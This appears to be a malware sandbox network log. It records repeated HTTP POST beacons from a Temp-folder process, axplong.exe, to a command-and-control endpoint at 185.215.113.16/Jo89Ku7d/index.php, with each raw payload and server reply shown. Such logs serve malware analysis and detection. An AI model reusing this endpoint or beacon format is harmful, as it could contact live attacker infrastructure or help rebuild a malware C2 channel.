Sep 26, 2024 22:42:49.395003080 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:49.630713940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	62714	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:49.741010904 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:50.468578100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:50.472064972 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:50.704186916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	62715	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:50.816426039 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:51.524024010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:51.524771929 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:51.786039114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	62716	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:51.894232035 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:53.581866026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:53.582782984 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:53.586107016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:53.588691950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:53.589457989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:53.812664032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	62717	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:53.925309896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:54.624934912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:54.625822067 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:54.852675915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	62718	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:54.972063065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:55.693850994 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:55.887156963 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:56.130419016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	62719	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:56.237579107 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:56.957654953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:56.958610058 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:57.186944962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	62720	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:57.299981117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:58.011914015 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:58.014436960 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:58.242690086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	62721	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:58.362773895 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:59.068434000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:59.069276094 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:59.293446064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	62722	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:59.409925938 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:00.101188898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:43:00.103750944 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:43:00.325798988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	62723	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:00.440840006 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:01.140571117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:43:01.141330957 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:43:01.365513086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	62724	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:01.487586975 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:02.199053049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:43:02.199703932 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:43:02.424695015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	62725	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:43:02.601409912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:43:03.310697079 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	62726	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
